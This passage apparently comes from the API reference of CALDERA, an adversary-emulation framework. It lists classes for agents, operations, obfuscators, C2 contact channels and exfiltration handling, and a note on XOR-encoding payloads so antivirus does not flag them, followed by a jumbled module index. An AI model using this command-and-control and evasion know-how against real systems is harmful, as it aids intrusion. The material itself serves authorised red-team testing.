async gui_modification(**kwargs)
async heartbeat_modification(**kwargs)
classmethod is_global_variable(variable)
async kill()
load_schema = <AgentSchema(many=False)>
privileged_to_run(ability)
replace(encoded_cmd, file_svc)
schema = <AgentSchema(many=False)>
set_pending_executor_path_update(executor_name, new_binary_path)
Mark specified executor to update its binary path to the new path. :param executor_name: name of executor
for agent to update binary path :type executor_name: str :param new_binary_path: new binary path for
executor to reference :type new_binary_path: str
set_pending_executor_removal(executor_name)
Mark specified executor to remove. :param executor_name: name of executor for agent to remove :type
executor_name: str
store(ram)
property unique
remove_nulls(in_data, **_)
remove_properties(data, **_)
app.objects.c_data_encoder module
display_schema = <DataEncoderSchema(many=False)>
schema = <DataEncoderSchema(many=False)>
store(ram)
property unique
app.objects.c_obfuscator module
load(agent)
schema = <ObfuscatorSchema(many=False)>
store(ram)
property unique
app.objects.c_objective module
property percentage
schema = <ObjectiveSchema(many=False)>
store(ram)
property unique
remove_properties(data, **_)
app.objects.c_operation module
exception app.objects.c_operation.InvalidOperationStateError
Bases: Exception
class app.objects.c_operation.Operation(name, adversary=None, agents=None, id='', jitter='2/8',
source=None, planner=None, state='running',
autonomous=True, obfuscator='plain-text', group=None,
auto_close=True, visibility=50, access=None,
use_learning_parsers=True)
Bases: FirstClassObjectInterface, BaseObject
EVENT_EXCHANGE = 'operation'
EVENT_QUEUE_COMPLETED = 'completed'
EVENT_QUEUE_STATE_CHANGED = 'state_changed'
class Reason(value)
Bases: Enum
An enumeration.
EXECUTOR = 1
FACT_DEPENDENCY = 2
OP_RUNNING = 4
PLATFORM = 0
PRIVILEGE = 3
UNTRUSTED = 5
class States(value)
Bases: Enum
An enumeration.
CLEANUP = 'cleanup'
FINISHED = 'finished'
OUT_OF_TIME = 'out_of_time'
PAUSED = 'paused'
RUNNING = 'running'
RUN_ONE_LINK = 'run_one_link'
async active_agents()
add_link(link)
async all_facts()
async all_relationships()
async apply(link)
async cede_control_to_planner(services)
async close(services)
async get_active_agent_by_paw(paw)
classmethod get_finished_states()
async get_skipped_abilities_by_agent(data_svc)
classmethod get_states()
has_link(link_id)
async is_closeable()
async is_finished()
link_status()
ran_ability_id(ability_id)
async run(services)
schema = <OperationSchema(many=False)>
set_start_details()
property state
property states
store(ram)
property unique
async update_operation_agents(services)
update_untrusted_agents(agent)
async wait_for_completion()
async wait_for_links_completion(link_ids)
Wait for started links to be completed :param link_ids: :return: None
async write_event_logs_to_disk(file_svc, data_svc, output=False)
remove_properties(data, **_)
app.objects.c_planner module
schema = <PlannerSchema(many=False)>
store(ram)
property unique
async which_plugin()
build_planner(data, **kwargs)
app.objects.c_plugin module
display_schema = <PluginSchema(many=False)>
async enable(services)
async expand(services)
load_plugin()
schema = <PluginSchema(many=False)>
store(ram)
property unique
app.objects.c_schedule module
store(ram)
property unique
Bases: Schema
build_schedule(data, **kwargs)
app.objects.c_source module
schema = <SourceSchema(many=False)>
store(ram)
property unique
build_source(data, **kwargs)
fix_adjustments(in_data, **_)
app.service namespace
Subpackages
app.service.interfaces namespace
Submodules
app.service.interfaces.i_app_svc module
class app.service.interfaces.i_app_svc.AppServiceInterface
Bases: ABC
abstract find_link(unique)
Locate a given link by its unique property :param unique: :return:
abstract find_op_with_link(link_id)
Locate an operation with the given link ID :param link_id: :return: Operation or None
abstract load_plugin_expansions(plugins)
abstract load_plugins(plugins)
Store all plugins in the data store :return:
abstract register_contacts()
abstract resume_operations()
Resume all unfinished operations :return: None
abstract retrieve_compiled_file(name, platform, location='')
abstract run_scheduler()
Kick off all scheduled jobs, as their schedule determines :return:
abstract start_sniffer_untrusted_agents()
Cyclic function that repeatedly checks if there are agents to be marked as untrusted :return: None
abstract teardown()
app.service.interfaces.i_auth_svc module
class app.service.interfaces.i_auth_svc.AuthServiceInterface
Bases: ABC
abstract apply(app, users)
Set up security on server boot :param app: :param users: :return: None
abstract check_permissions(group, request)
Check if a request is allowed based on the user permissions :param group: :param request: :return: None
abstract get_permissions(request)
abstract login_user(request)
Kick off all scheduled jobs, as their schedule determines :return:
abstract static logout_user(request)
Log the user out :param request: :return: None
app.service.interfaces.i_contact_svc module
class app.service.interfaces.i_contact_svc.ContactServiceInterface
Bases: ABC
abstract build_filename()
abstract handle_heartbeat()
Accept all components of an agent profile and save a new agent or register an updated heartbeat. :return:
the agent object, instructions to execute
abstract register_contact(contact)
abstract register_tunnel(tunnel)
app.service.interfaces.i_data_svc module
class app.service.interfaces.i_data_svc.DataServiceInterface
Bases: ObjectServiceInterface
abstract apply(collection)
Add a new collection to RAM
Parameters
collection –
Returns
abstract load_data(plugins)
Non-blocking read all the data sources to populate the object store
Returns
None
app.service.interfaces.i_event_svc module
class app.service.interfaces.i_event_svc.EventServiceInterface
Bases: ABC
abstract fire_event(event, **callback_kwargs)
Fire an event :param event: The event topic and (optional) subtopic, separated by a ‘/’ :param call-
back_kwargs: Any additional parameters to pass to the event handler :return: None
abstract observe_event(event, callback)
Register an event handler :param event: The event topic and (optional) subtopic, separated by a ‘/’ :param
callback: The function that will handle the event :return: None
app.service.interfaces.i_file_svc module
class app.service.interfaces.i_file_svc.FileServiceInterface
Bases: ABC
abstract add_special_payload(name, func)
Call a special function when specific payloads are downloaded :param name: :param func: :return:
abstract compile_go(platform, output, src_fle, arch, ldflags, cflags, buildmode, build_dir, loop)
Dynamically compile a go file :param platform: :param output: :param src_fle: :param arch: Compile
architecture selection (defaults to AMD64) :param ldflags: A string of ldflags to use when building the go
executable :param cflags: A string of CFLAGS to pass to the go compiler :param buildmode: GO compiler
buildmode flag :param build_dir: The path to build should take place in :return:
abstract create_exfil_sub_directory(dir_name)
app.service.interfaces.i_knowledge_svc module
class app.service.interfaces.i_knowledge_svc.KnowledgeServiceInterface
Bases: ObjectServiceInterface
abstract async add_fact(fact, constraints=None)
Add a fact to the internal store
Parameters
• fact – Fact to add
Returns
list of facts matching the criteria
abstract async get_meta_facts(meta_fact=None, agent=None, group=None)
Returns the complete set of facts associated with a meta-fact construct [In Development]
abstract async get_relationships(criteria, restrictions=None)
Retrieve relationships from the internal store
Parameters
criteria – dictionary containing fields to match on
Returns
list of matching relationships
abstract async get_rules(criteria, restrictions=None)
Retrieve rules from the internal store
Parameters
criteria – dictionary containing fields to match on
Returns
list of matching rules
abstract async update_fact(criteria, updates)
Update a fact in the internal store
Parameters
• criteria – dictionary containing fields to match on
• updates – dictionary containing fields to replace
abstract async update_relationship(criteria, updates)
Update a relationship in the internal store
Parameters
• criteria – dictionary containing fields to match on
• updates – dictionary containing fields to modify
app.service.interfaces.i_learning_svc module
class app.service.interfaces.i_learning_svc.LearningServiceInterface
Bases: ABC
abstract static add_parsers(directory)
abstract build_model()
The model is a static set of all variables used inside all ability commands This can be used to determine
which facts - when found together - are more likely to be used together :return:
abstract learn(facts, link, blob)
app.service.interfaces.i_login_handler module
app.service.interfaces.i_object_svc module
class app.service.interfaces.i_object_svc.ObjectServiceInterface
Bases: ABC
abstract static destroy()
Clear out all data :return:
abstract restore_state()
Load data from disk :return:
abstract save_state()
Save stored data to disk :return:
app.service.interfaces.i_planning_svc module
class app.service.interfaces.i_planning_svc.PlanningServiceInterface
Bases: ABC
abstract generate_and_trim_links(agent, operation, abilities, trim)
app.service.interfaces.i_rest_svc module
class app.service.interfaces.i_rest_svc.RestServiceInterface
Bases: ABC
abstract apply_potential_link(link)
abstract construct_agents_for_group(group)
abstract delete_ability(data)
abstract delete_adversary(data)
abstract delete_agent(data)
abstract delete_operation(data)
abstract display_operation_report(data)
abstract display_result(data)
abstract download_contact_report(contact)
abstract find_abilities(paw)
abstract get_link_pin(json_data)
abstract list_payloads()
abstract update_agent_data(data)
abstract update_chain_data(data)
abstract update_config(data)
abstract update_planner(data)
Update a new planner from either the GUI or REST API with new stopping conditions. This overwrites the
existing YML file. :param data: :return: the ID of the created adversary
app.service.login_handlers namespace
Submodules
app.service.login_handlers.default module
class app.service.login_handlers.default.DefaultLoginHandler(services)
Bases: LoginHandlerInterface
async handle_login(request, **kwargs)
Handle login request
Parameters
request –
Returns
the response/location of where the user is trying to navigate
Raises
HTTP exception, such as HTTPFound for redirect, or HTTPUnauthorized
async handle_login_redirect(request, **kwargs)
Handle login redirect.
Returns
login.html template if use_template is set to True in kwargs.
Raises
web.HTTPFound – HTTPFound exception to redirect to the ‘/login’ page if use_template is
set to False or not included in kwargs.
Submodules
app.service.app_svc module
class app.service.app_svc.AppService(application)
Bases: AppServiceInterface, BaseService
property errors
async find_link(unique)
Locate a given link by its unique property :param unique: :return:
async find_op_with_link(link_id)
Retrieves the operation that a link_id belongs to. Will search currently running operations first.
get_loaded_plugins()
async load_plugin_expansions(plugins=())
async load_plugins(plugins)
Store all plugins in the data store :return:
async register_contact_tunnels(contact_svc)
async register_contacts()
async run_scheduler()
Kick off all scheduled jobs, as their schedule determines :return:
async start_sniffer_untrusted_agents()
Cyclic function that repeatedly checks if there are agents to be marked as untrusted :return: None
async teardown(main_config_file='default')
async update_operations_with_untrusted_agent(untrusted_agent)
async validate_requirements()
async watch_ability_files()
app.service.auth_svc module
class app.service.auth_svc.AuthService
Bases: AuthServiceInterface, BaseService
class User(username, password, permissions)
Bases: tuple
property password
Alias for field number 1
property permissions
Alias for field number 2
property username
Alias for field number 0
async apply(app, users)
Set up security on server boot :param app: :param users: :return: None
async check_permissions(group, request)
Check if a request is allowed based on the user permissions :param group: :param request: :return: None
async create_user(username, password, group)
property default_login_handler
async get_permissions(request)
async is_request_authenticated(request)
async request_has_valid_user_session(request)
app.service.contact_svc module
class app.service.contact_svc.ContactService
Bases: ContactServiceInterface, BaseService
async build_filename()
async deregister_contacts()
async get_contact(name)
async get_tunnel(name)
async handle_heartbeat(**kwargs)
Accept all components of an agent profile and save a new agent or register an updated heartbeat. :return:
the agent object, instructions to execute
async register_contact(contact)
async register_tunnel(tunnel)
app.service.contact_svc.report(func)
app.service.data_svc module
class app.service.data_svc.DataService
Bases: DataServiceInterface, BaseService
async apply(collection)
Add a new collection to RAM
Parameters
collection –
Returns
async convert_v0_ability_executor(ability_data: dict)
Checks if ability file follows v0 executor format, otherwise assumes v1 ability formatting.
async convert_v0_ability_requirements(requirements_data: list)
Checks if ability file follows v0 requirement format, otherwise assumes v1 ability formatting.
convert_v0_ability_technique_id(ability_data: dict)
Checks if ability file follows v0 technique_id format, otherwise assumes v1 ability formatting.
convert_v0_ability_technique_name(ability_data: dict)
Checks if ability file follows v0 technique_name format, otherwise assumes v1 ability formatting.
async create_or_update_everything_adversary()
async load_data(plugins=())
Non-blocking read all the data sources to populate the object store
Returns
None
async load_executors_from_list(executors: list)
async load_executors_from_platform_dict(platforms)
• match – dict()
Returns
a list of c_object types
async reload_data(plugins=())
Blocking read all the data sources to populate the object store
Returns
None
async remove(object_name, match)
Remove any c_objects which match a search
Parameters
• object_name –
• match – dict()
Returns
async restore_state()
Restore the object database
Returns
async save_state()
Save stored data to disk :return:
async search(value, object_name)
async store(c_object)
Accept any c_object type and store it (create/update) in RAM
Parameters
c_object –
Returns
a single c_object
app.service.event_svc module
class app.service.event_svc.EventService
Bases: EventServiceInterface, BaseService
async fire_event(exchange=None, queue=None, timestamp=True, **callback_kwargs)
Fire an event :param event: The event topic and (optional) subtopic, separated by a ‘/’ :param call-
back_kwargs: Any additional parameters to pass to the event handler :return: None
async handle_exceptions(awaitable)
app.service.file_svc module
class app.service.file_svc.FileSvc
Bases: FileServiceInterface, BaseService
async add_special_payload(name, func)
Call a special function when specific payloads are downloaded
Parameters
• name –
• func –
Returns
static add_xored_extension(filename)
async create_exfil_sub_directory(dir_name)
get_payload_packer(packer)
static is_extension_xored(filename)
list_exfilled_files(startdir=None)
app.service.knowledge_svc module
class app.service.knowledge_svc.KnowledgeService
Bases: KnowledgeServiceInterface, BaseService
async add_fact(fact, constraints=None)
Add a fact to the internal store
Parameters
• fact – Fact to add
• constraints – any potential constraints
async add_relationship(relationship, constraints=None)
Add a relationship to the internal store
Parameters
• relationship – Relationship object to add
• constraints – optional constraints on the use of the relationship
async add_rule(rule, constraints=None)
Add a rule to the internal store
Parameters
• rule – Rule object to add
• constraints – dictionary containing fields to match on
app.service.learning_svc module
class app.service.learning_svc.LearningService
Bases: LearningServiceInterface, BaseService
static add_parsers(directory)
async build_model()
The model is a static set of all variables used inside all ability commands This can be used to determine
which facts - when found together - are more likely to be used together :return:
async learn(facts, link, blob, operation=None)
app.service.planning_svc module
class app.service.planning_svc.PlanningService(global_variable_owners=None)
Bases: PlanningServiceInterface, BasePlanningService
async add_ability_to_bucket(ability, bucket)
Adds bucket tag to ability
Parameters
• ability (Ability) – Ability to add bucket to
• bucket (string) – Bucket to add to ability
Parameters
• planner (LogicalPlanner) – Planner to check for stopping conditions on
• bucket (string) – Bucket to pull abilities from
• operation (Operation) – Operation to run links on
• agent (Agent, optional) – Agent to run links on, defaults to None
• batch (bool, optional) – Push all bucket links immediately. Will check if operation
has been stopped (by user) after all bucket links complete. ‘False’ will push links one at
a time, and wait for each to complete. Will check if operation has been stopped (by user)
after each single link is completed. Defaults to False
• condition_stop (bool, optional) – Enable stopping of execution if stopping condi-
tions are met. If set to False, the bucket will continue execution even if stopping conditions
are met. defaults to True
async generate_and_trim_links(agent, operation, abilities, trim=True)
Generate new links based on abilities
Creates new links based on given operation, agent, and abilities. Optionally, trim links using trim_links()
to return only valid links with completed facts.
Parameters
• operation (Operation) – Operation to generate links on
• agent (Agent) – Agent to generate links on
• abilities (list(Ability)) – Abilities to generate links for
• trim (bool, optional) – call trim_links() on list of links before returning, defaults to
True
Returns
A list of links
Return type
list(Links)
async get_cleanup_links(operation, agent=None)
Generate cleanup links
Generates cleanup links for given operation and agent. If no agent is provided, cleanup links will be gener-
ated for all agents in an operation.
Parameters
• operation (Operation) – Operation to generate links on
• agent (Agent, optional) – Agent to generate links on, defaults to None
Returns
a list of links
async get_links(operation, buckets=None, agent=None, trim=True)
Generate links for use in an operation
For an operation and agent combination, create links (that can be executed). When no agent is supplied,
links for all agents are returned.
Parameters
• operation (Operation) – Operation to generate links for
app.service.rest_svc module
class app.service.rest_svc.RestService
Bases: RestServiceInterface, BaseService
async add_manual_command(access, data)
async apply_potential_link(link)
async build_potential_abilities(operation)
async construct_agents_for_group(group)
async delete_ability(data)
async delete_adversary(data)
async delete_agent(data)
async delete_operation(data)
async display_operation_report(data)
async display_result(data)
async download_contact_report(contact)
async find_abilities(paw)
async get_agent_configuration(data)
async get_link_pin(json_data)
async list_exfil_files(data)
async list_payloads()
async update_agent_data(data)
async update_chain_data(data)
async update_config(data)
async update_planner(data)
Update a new planner from either the GUI or REST API with new stopping conditions. This overwrites the
existing YML file. :param data: :return: the ID of the created adversary
app.utility namespace
Submodules
app.utility.base_knowledge_svc module
class app.utility.base_knowledge_svc.BaseKnowledgeService
Bases: BaseService
app.utility.base_obfuscator module
class app.utility.base_obfuscator.BaseObfuscator(agent)
Bases: BaseWorld
run(link, **kwargs)
app.utility.base_object module
class app.utility.base_object.AppConfigGlobalVariableIdentifier
Bases: object
classmethod is_global_variable(variable)
class app.utility.base_object.BaseObject
Bases: BaseWorld
property access
static clean(d)
property created
property display
display_schema = None
static hash(s)
classmethod load(dict_obj)
load_schema = None
match(criteria)
replace_app_props(encoded_string)
schema = None
search_tags(value)
update(field, value)
Updates the given field to the given value as long as the value is not None and the new value is different
from the current value. Ignoring None prevents current property values from being overwritten to None if
the given property is not intentionally passed back to be updated (example: Agent heartbeat)
Parameters
• field – object property to update
• value – value to update to
app.utility.base_parser module
class app.utility.base_parser.BaseParser(parser_info)
Bases: object
static broadcastip(blob)
static email(blob)
Parse out email addresses :param blob: :return:
static filename(blob)
Parse out filenames :param blob: :return:
static ip(blob)
static line(blob)
Split a blob by line :param blob: :return:
static load_json(blob)
app.utility.base_planning_svc module
class app.utility.base_planning_svc.BasePlanningService(global_variable_owners=None)
Bases: BaseService
add_global_variable_owner(global_variable_owner)
Adds a global variable owner to the internal registry.
These will be used for identification of global variables when performing variable-fact substitution.
Args:
global_variable_owner: An object that exposes an is_global_variable(. . . ) method and accepts
a string
containing a bare/unwrapped variable.
async add_test_variants(links, agent, facts=(), rules=(), operation=None, trim_unset_variables=False,
trim_missing_requirements=False)
Create a list of all possible links for a given set of templates
Parameters
• links –
• agent –
• facts –
• rules –
• operation –
• trim_unset_variables –
• trim_missing_requirements –
Returns
updated list of links
is_global_variable(variable)
re_index = re.compile('(?<=\\[filters\\().+?(?=\\)\\])')
re_limited = re.compile('#{.*\\[*\\]}')
re_trait = re.compile('(?<=\\{).+?(?=\\[)')
Parameters
• operation –
• links –
• agent –
Returns
trimmed list of links
app.utility.base_service module
class app.utility.base_service.BaseService
Bases: BaseWorld
add_service(name, svc)
classmethod get_service(name)
classmethod get_services()
classmethod remove_service(name)
app.utility.base_world module
class app.utility.base_world.BaseWorld
Bases: object
A collection of base static functions for service & object module usage
class Access(value)
Bases: Enum
An enumeration.
APP = 0
BLUE = 2
HIDDEN = 3
RED = 1
class Privileges(value)
Bases: Enum
An enumeration.
Elevated = 1
User = 0
TIME_FORMAT = '%Y-%m-%dT%H:%M:%SZ'
static check_requirement(params)
static clear_config()
static create_logger(name)
static encode_string(s)
static generate_name(size=16)
static generate_number(size=6)
static get_current_timestamp(date_format='%Y-%m-%dT%H:%M:%SZ')
static is_base64(s)
static is_uuid4(s)
static jitter(fraction)
re_base64 =
re.compile('[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
re.DOTALL)
static strip_yml(path)
app.utility.config_generator module
app.utility.config_generator.ensure_local_config()
Checks if a local.yml config file exists. If not, generates a new local.yml file using secure random values.
app.utility.config_generator.log_config_message(config_path)
app.utility.config_generator.make_secure_config()
app.utility.file_decryptor module
app.utility.file_decryptor.get_encryptor(salt, key)
app.utility.file_decryptor.read(filename, encryptor)
app.utility.payload_encoder module
This module contains helper functions for encoding and decoding payload files.
If AV is running on the server host, then it may sometimes flag, quarantine, or delete CALDERA payloads. To help
prevent this, encoded payloads can be used to prevent AV from breaking the server. The convention expected by the
server is that encoded payloads will be XOR’ed with the DEFAULT_KEY contained in the payload_encoder.py module.
Additionally, payload_encoder.py can be used from the command-line to add a new encoded payload.
` python /path/to/payload_encoder.py input_file output_file `
NOTE: In order for the server to detect the availability of an encoded payload, the payload file’s name must end in the
.xored extension.
app.utility.payload_encoder.xor_bytes(in_bytes, key=None)
app.utility.rule_set module
class app.utility.rule_set.RuleAction(value)
Bases: Enum
An enumeration.
ALLOW = 1
DENY = 0
class app.utility.rule_set.RuleSet(rules)
Bases: object
async apply_rules(facts)
async is_fact_allowed(fact)
29.1.2 Submodules
app.version.get_version()
THIRTY
• genindex
• modindex
• search
213
caldera
a app.api.v2.schemas.config_schemas, 150
app, 212 app.api.v2.schemas.deploy_command_schemas,
app.api, 139 150
app.api.packs, 139 app.api.v2.schemas.error_schemas, 151
app.api.packs.advanced, 139 app.api.v2.security, 153
app.api.packs.campaign, 139 app.api.v2.validation, 153
app.api.rest_api, 153 app.contacts, 154
app.api.v2, 153 app.contacts.contact_dns, 156
app.api.v2.errors, 152 app.contacts.contact_ftp, 159
app.api.v2.handlers, 139 app.contacts.contact_gist, 160
app.api.v2.handlers.ability_api, 140 app.contacts.contact_html, 160
app.api.v2.handlers.adversary_api, 140 app.contacts.contact_http, 161
app.api.v2.handlers.agent_api, 140 app.contacts.contact_slack, 161
app.api.v2.handlers.base_api, 141 app.contacts.contact_tcp, 161
app.api.v2.handlers.base_object_api, 141 app.contacts.contact_udp, 162
app.api.v2.handlers.config_api, 142 app.contacts.contact_websocket, 162
app.api.v2.handlers.contact_api, 142 app.contacts.handles, 154
app.api.v2.handlers.fact_api, 142 app.contacts.handles.h_beacon, 154
app.api.v2.handlers.fact_source_api, 143 app.contacts.tunnels, 154
app.api.v2.handlers.health_api, 143 app.contacts.tunnels.tunnel_ssh, 154
app.api.v2.handlers.obfuscator_api, 143 app.data_encoders, 162
app.api.v2.handlers.objective_api, 143 app.data_encoders.base64_basic, 162
app.api.v2.handlers.operation_api, 144 app.data_encoders.plain_text, 163
app.api.v2.handlers.planner_api, 144 app.learning, 163
app.api.v2.handlers.plugins_api, 145 app.learning.p_ip, 163
app.api.v2.handlers.schedule_api, 145 app.learning.p_path, 163
app.api.v2.managers, 145 app.objects, 163
app.api.v2.managers.ability_api_manager, 145 app.objects.c_ability, 173
app.api.v2.managers.adversary_api_manager, app.objects.c_adversary, 175
146 app.objects.c_agent, 175
app.api.v2.managers.agent_api_manager, 146 app.objects.c_data_encoder, 177
app.api.v2.managers.base_api_manager, 146 app.objects.c_obfuscator, 178
app.api.v2.managers.config_api_manager, 147 app.objects.c_objective, 178
app.api.v2.managers.contact_api_manager, 147 app.objects.c_operation, 179
app.api.v2.managers.fact_api_manager, 147 app.objects.c_planner, 181
app.api.v2.managers.operation_api_manager, app.objects.c_plugin, 182
148 app.objects.c_schedule, 182
app.api.v2.managers.schedule_api_manager, 148 app.objects.c_source, 183
app.api.v2.responses, 152 app.objects.interfaces, 163
app.api.v2.schemas, 149 app.objects.interfaces.i_object, 163
app.api.v2.schemas.base_schemas, 149 app.objects.secondclass, 164
app.api.v2.schemas.caldera_info_schemas, 149 app.objects.secondclass.c_executor, 164
215
caldera
app.objects.secondclass.c_fact, 165
app.objects.secondclass.c_goal, 166
app.objects.secondclass.c_instruction, 166
app.objects.secondclass.c_link, 167
app.objects.secondclass.c_parser, 168
app.objects.secondclass.c_parserconfig, 169
app.objects.secondclass.c_relationship, 169
app.objects.secondclass.c_requirement, 171
app.objects.secondclass.c_result, 171
app.objects.secondclass.c_rule, 172
app.objects.secondclass.c_variation, 172
app.objects.secondclass.c_visibility, 173
app.service, 184
app.service.app_svc, 192
app.service.auth_svc, 193
app.service.contact_svc, 195
app.service.data_svc, 196
app.service.event_svc, 197
app.service.file_svc, 198
app.service.interfaces, 184
app.service.interfaces.i_app_svc, 184
app.service.interfaces.i_auth_svc, 185
app.service.interfaces.i_contact_svc, 185
app.service.interfaces.i_data_svc, 185
app.service.interfaces.i_event_svc, 186
app.service.interfaces.i_file_svc, 187
app.service.interfaces.i_knowledge_svc, 187
app.service.interfaces.i_learning_svc, 189
app.service.interfaces.i_login_handler, 190
app.service.interfaces.i_object_svc, 190
app.service.interfaces.i_planning_svc, 190
app.service.interfaces.i_rest_svc, 191
app.service.knowledge_svc, 199
app.service.learning_svc, 201
app.service.login_handlers, 192
app.service.login_handlers.default, 192
app.service.planning_svc, 201
app.service.rest_svc, 205
app.utility, 206
app.utility.base_knowledge_svc, 206
app.utility.base_obfuscator, 206
app.utility.base_object, 206
app.utility.base_parser, 207
app.utility.base_planning_svc, 208
app.utility.base_service, 209
app.utility.base_world, 209
app.utility.config_generator, 211
app.utility.file_decryptor, 211
app.utility.payload_encoder, 211
app.utility.rule_set, 212
app.version, 212
A add_global_variable_owner()
A (app.contacts.contact_dns.DnsRecordType attribute), (app.utility.base_planning_svc.BasePlanningService
157 method), 208
AAAA (app.contacts.contact_dns.DnsRecordType at- add_link() (app.objects.c_operation.Operation
tribute), 157 method), 179
Ability (class in app.objects.c_ability), 173 add_manual_command()
ability_id (app.objects.c_source.Adjustment prop- (app.service.rest_svc.RestService method),
erty), 183 205
AbilityApi (class in app.api.v2.handlers.ability_api), add_parsers() (app.service.interfaces.i_learning_svc.LearningServiceInt
140 static method), 189
AbilityApiManager (class in add_parsers() (app.service.learning_svc.LearningService
app.api.v2.managers.ability_api_manager), static method), 201
145 add_relationship() (app.service.interfaces.i_knowledge_svc.Knowledge
AbilitySchema (class in app.objects.c_ability), 174 method), 188
accept() (app.contacts.contact_tcp.TcpSessionHandler add_relationship() (app.service.knowledge_svc.KnowledgeService
method), 162 method), 199
access (app.utility.base_object.BaseObject property), add_relationships()
206 (app.api.v2.handlers.fact_api.FactApi method),
AccessSchema (class in app.utility.base_world), 209 142
active_agents() (app.objects.c_operation.Operation add_routes() (app.api.v2.handlers.ability_api.AbilityApi
method), 179 method), 140
add_ability_to_bucket() add_routes() (app.api.v2.handlers.adversary_api.AdversaryApi
(app.service.planning_svc.PlanningService method), 140
method), 201 add_routes() (app.api.v2.handlers.agent_api.AgentApi
add_bucket() (app.objects.c_ability.Ability method), method), 140
173 add_routes() (app.api.v2.handlers.base_api.BaseApi
add_chunk() (app.contacts.contact_dns.Handler.TunneledMessage method), 141
method), 158 add_routes() (app.api.v2.handlers.base_object_api.BaseObjectApi
add_chunk() (app.contacts.contact_gist.Contact.GistUpload method), 141
method), 160 add_routes() (app.api.v2.handlers.config_api.ConfigApi
add_chunk() (app.contacts.contact_slack.Contact.SlackUpload method), 142
method), 161 add_routes() (app.api.v2.handlers.contact_api.ContactApi
add_executor() (app.objects.c_ability.Ability method), method), 142
173 add_routes() (app.api.v2.handlers.fact_api.FactApi
add_executors() (app.objects.c_ability.Ability method), 142
method), 173 add_routes() (app.api.v2.handlers.fact_source_api.FactSourceApi
method), 143
add_fact() (app.service.interfaces.i_knowledge_svc.KnowledgeServiceInterface
method), 187 add_routes() (app.api.v2.handlers.health_api.HealthApi
add_fact() (app.service.knowledge_svc.KnowledgeService method), 143
method), 199 add_routes() (app.api.v2.handlers.obfuscator_api.ObfuscatorApi
add_facts() (app.api.v2.handlers.fact_api.FactApi method), 143
method), 142 add_routes() (app.api.v2.handlers.objective_api.ObjectiveApi
217
caldera
218 Index
caldera
app.api.v2.handlers.schedule_api app.contacts.contact_tcp
module, 145 module, 161
app.api.v2.managers app.contacts.contact_udp
module, 145 module, 162
app.api.v2.managers.ability_api_manager app.contacts.contact_websocket
module, 145 module, 162
app.api.v2.managers.adversary_api_manager app.contacts.handles
module, 146 module, 154
app.api.v2.managers.agent_api_manager app.contacts.handles.h_beacon
module, 146 module, 154
app.api.v2.managers.base_api_manager app.contacts.tunnels
module, 146 module, 154
app.api.v2.managers.config_api_manager app.contacts.tunnels.tunnel_ssh
module, 147 module, 154
app.api.v2.managers.contact_api_manager app.data_encoders
module, 147 module, 162
app.api.v2.managers.fact_api_manager app.data_encoders.base64_basic
module, 147 module, 162
app.api.v2.managers.operation_api_manager app.data_encoders.plain_text
module, 148 module, 163
app.api.v2.managers.schedule_api_manager app.learning
module, 148 module, 163
app.api.v2.responses app.learning.p_ip
module, 152 module, 163
app.api.v2.schemas app.learning.p_path
module, 149 module, 163
app.api.v2.schemas.base_schemas app.objects
module, 149 module, 163
app.api.v2.schemas.caldera_info_schemas app.objects.c_ability
module, 149 module, 173
app.api.v2.schemas.config_schemas app.objects.c_adversary
module, 150 module, 175
app.api.v2.schemas.deploy_command_schemas app.objects.c_agent
module, 150 module, 175
app.api.v2.schemas.error_schemas app.objects.c_data_encoder
module, 151 module, 177
app.api.v2.security app.objects.c_obfuscator
module, 153 module, 178
app.api.v2.validation app.objects.c_objective
module, 153 module, 178
app.contacts app.objects.c_operation
module, 154 module, 179
app.contacts.contact_dns app.objects.c_planner
module, 156 module, 181
app.contacts.contact_ftp app.objects.c_plugin
module, 159 module, 182
app.contacts.contact_gist app.objects.c_schedule
module, 160 module, 182
app.contacts.contact_html app.objects.c_source
module, 160 module, 183
app.contacts.contact_http app.objects.interfaces
module, 161 module, 163
app.contacts.contact_slack app.objects.interfaces.i_object
module, 161 module, 163
Index 219
caldera
app.objects.secondclass app.service.interfaces.i_file_svc
module, 164 module, 187
app.objects.secondclass.c_executor app.service.interfaces.i_knowledge_svc
module, 164 module, 187
app.objects.secondclass.c_fact app.service.interfaces.i_learning_svc
module, 165 module, 189
app.objects.secondclass.c_goal app.service.interfaces.i_login_handler
module, 166 module, 190
app.objects.secondclass.c_instruction app.service.interfaces.i_object_svc
module, 166 module, 190
app.objects.secondclass.c_link app.service.interfaces.i_planning_svc
module, 167 module, 190
app.objects.secondclass.c_parser app.service.interfaces.i_rest_svc
module, 168 module, 191
app.objects.secondclass.c_parserconfig app.service.knowledge_svc
module, 169 module, 199
app.objects.secondclass.c_relationship app.service.learning_svc
module, 169 module, 201
app.objects.secondclass.c_requirement app.service.login_handlers
module, 171 module, 192
app.objects.secondclass.c_result app.service.login_handlers.default
module, 171 module, 192
app.objects.secondclass.c_rule app.service.planning_svc
module, 172 module, 201
app.objects.secondclass.c_variation app.service.rest_svc
module, 172 module, 205
app.objects.secondclass.c_visibility app.utility
module, 173 module, 206
app.service app.utility.base_knowledge_svc
module, 184 module, 206
app.service.app_svc app.utility.base_obfuscator
module, 192 module, 206
app.service.auth_svc app.utility.base_object
module, 193 module, 206
app.service.contact_svc app.utility.base_parser
module, 195 module, 207
app.service.data_svc app.utility.base_planning_svc
module, 196 module, 208
app.service.event_svc app.utility.base_service
module, 197 module, 209
app.service.file_svc app.utility.base_world
module, 198 module, 209
app.service.interfaces app.utility.config_generator
module, 184 module, 211
app.service.interfaces.i_app_svc app.utility.file_decryptor
module, 184 module, 211
app.service.interfaces.i_auth_svc app.utility.payload_encoder
module, 185 module, 211
app.service.interfaces.i_contact_svc app.utility.rule_set
module, 185 module, 212
app.service.interfaces.i_data_svc app.version
module, 185 module, 212
app.service.interfaces.i_event_svc AppConfigGlobalVariableIdentifier (class in
module, 186 app.utility.base_object), 206
220 Index
caldera
Index 221
caldera
build_model() (app.service.interfaces.i_learning_svc.LearningServiceInterface
can_ignore() (app.objects.secondclass.c_link.Link
method), 189 method), 167
build_model() (app.service.learning_svc.LearningServicecapabilities() (app.objects.c_agent.Agent method),
method), 201 176
build_obfuscator() (app.objects.c_obfuscator.ObfuscatorSchema
cede_control_to_planner()
method), 178 (app.objects.c_operation.Operation method),
build_objective() (app.objects.c_objective.ObjectiveSchema 180
method), 178 check_authorization() (in module
build_operation() (app.objects.c_operation.OperationSchema app.service.auth_svc), 195
